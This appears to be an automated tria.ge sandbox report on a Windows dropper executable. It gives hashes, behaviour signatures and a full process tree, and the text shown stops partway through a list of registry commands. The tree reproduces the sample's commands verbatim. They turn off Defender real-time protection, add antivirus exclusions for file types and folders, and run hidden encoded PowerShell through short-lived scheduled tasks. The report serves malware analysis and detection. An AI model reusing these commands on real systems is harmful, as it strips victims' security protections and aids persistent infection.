Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    94s
  • max time network
    100s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    08/08/2024, 22:38

General

  • Target

    634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe

  • Size

    7.3MB

  • MD5

    ace0b015f1fdcb6fa55bf1fc1a447dd4

  • SHA1

    602ffe036d9bbed14f4230ade5494efecb153834

  • SHA256

    634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56

  • SHA512

    8bcec61dec5739fffa5b2fd0a92699016cb778709f482fc8144449c4b414aa2632c1d81f4f010836ef1f19edac69843f76af64eb08d49c9fe3315b214af72657

  • SSDEEP

    196608:91O9GnorlTq8z+dgAZNHk05e1n2zosorKjfkB:3OQopGAl+Nf5ei4mzkB

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe
    "C:\Users\Admin\AppData\Local\Temp\634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Users\Admin\AppData\Local\Temp\7zSCF12.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2188
      • C:\Users\Admin\AppData\Local\Temp\7zSD105.tmp\Install.exe
        .\Install.exe /TWZIzdidDdU "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1784
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2940
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2784
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2680
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:296
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:2712
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2772
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                    PID:2832
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                PID:2320
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  6⤵
                    PID:2364
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:2180
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                  5⤵
                  • Indirect Command Execution
                  PID:2232
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    6⤵
                      PID:2472
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:2448
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                    5⤵
                    • Indirect Command Execution
                    • System Location Discovery: System Language Discovery
                    PID:2864
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      6⤵
                        PID:2808
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                          7⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2884
                          • C:\Windows\SysWOW64\gpupdate.exe
                            "C:\Windows\system32\gpupdate.exe" /force
                            8⤵
                              PID:2656
                    • C:\Windows\SysWOW64\forfiles.exe
                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                      4⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:1352
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        5⤵
                          PID:944
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2036
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                              7⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1116
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /CREATE /TN "bQeBRIfYCApeQZGKek" /SC once /ST 22:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc\TGxOdjVHuAohYJs\rZHgSAw.exe\" 4e /ztzDdidpucJ 525403 /S" /V1 /F
                        4⤵
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:2144
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 508
                        4⤵
                        • Loads dropped DLL
                        • Program crash
                        PID:2908
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {9EF94694-B88B-400A-B2E3-FF15838FDD20} S-1-5-18:NT AUTHORITY\System:Service:
                  1⤵
                    PID:2996
                    • C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc\TGxOdjVHuAohYJs\rZHgSAw.exe
                      C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc\TGxOdjVHuAohYJs\rZHgSAw.exe 4e /ztzDdidpucJ 525403 /S
                      2⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:1516
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        3⤵
                          PID:2160
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                            4⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:1976
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              5⤵
                                PID:2340
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                  6⤵
                                    PID:2092
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                4⤵
                                • Indirect Command Execution
                                PID:1728
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  5⤵
                                    PID:1624
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                      6⤵
                                        PID:1308
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                    4⤵
                                    • Indirect Command Execution
                                    PID:1560
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      5⤵
                                        PID:1648
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                          6⤵
                                            PID:1812
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                        4⤵
                                        • Indirect Command Execution
                                        • System Location Discovery: System Language Discovery
                                        PID:1660
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                          5⤵
                                            PID:1828
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3060
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          4⤵
                                          • Indirect Command Execution
                                          • System Location Discovery: System Language Discovery
                                          PID:1672
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                            5⤵
                                              PID:2148
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                6⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in System32 directory
                                                • System Location Discovery: System Language Discovery
                                                • Modifies data under HKEY_USERS
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2104
                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                  7⤵
                                                    PID:2300
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /CREATE /TN "gRdMakNMU" /SC once /ST 00:59:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                            3⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2432
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /run /I /tn "gRdMakNMU"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:876
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /DELETE /F /TN "gRdMakNMU"
                                            3⤵
                                              PID:2740
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                              3⤵
                                                PID:992
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                  4⤵
                                                  • Modifies Windows Defender Real-time Protection settings
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1676
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                3⤵
                                                  PID:1472
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                    4⤵
                                                    • Modifies Windows Defender Real-time Protection settings
                                                    PID:1788
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "gRfVcomiq" /SC once /ST 20:03:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                  3⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:1680
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /run /I /tn "gRfVcomiq"
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2560
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /DELETE /F /TN "gRfVcomiq"
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2912
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                  3⤵
                                                  • Indirect Command Execution
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2372
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                    4⤵
                                                      PID:2828
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                        5⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Drops file in System32 directory
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1324
                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                          6⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3040
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:32
                                                    3⤵
                                                      PID:2540
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:2516
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                        PID:2492
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                          • Windows security bypass
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1588
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1936
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:3032
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:64
                                                          3⤵
                                                            PID:2120
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3028
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /C copy nul "C:\Windows\Temp\wGQmUIZKEGuxadPB\PcdULMWl\YGxHApANvtCaWYPv.wsf"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2800
                                                          • C:\Windows\SysWOW64\wscript.exe
                                                            wscript "C:\Windows\Temp\wGQmUIZKEGuxadPB\PcdULMWl\YGxHApANvtCaWYPv.wsf"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Modifies data under HKEY_USERS
                                                            PID:1316
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2656
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2352
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FjYcCGTppOUn" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2952
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FjYcCGTppOUn" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2340
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OmYhQlgyU" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1728
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OmYhQlgyU" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1560
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dBdCwOiUpBsdC" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1100
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dBdCwOiUpBsdC" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2436
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZOpYAGqatpU2" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2104
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZOpYAGqatpU2" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3064
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eZNCfusnXmtZMmVB" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2628
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eZNCfusnXmtZMmVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:3004
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:408
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:928
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc" /t REG_DWORD /d 0 /reg:32
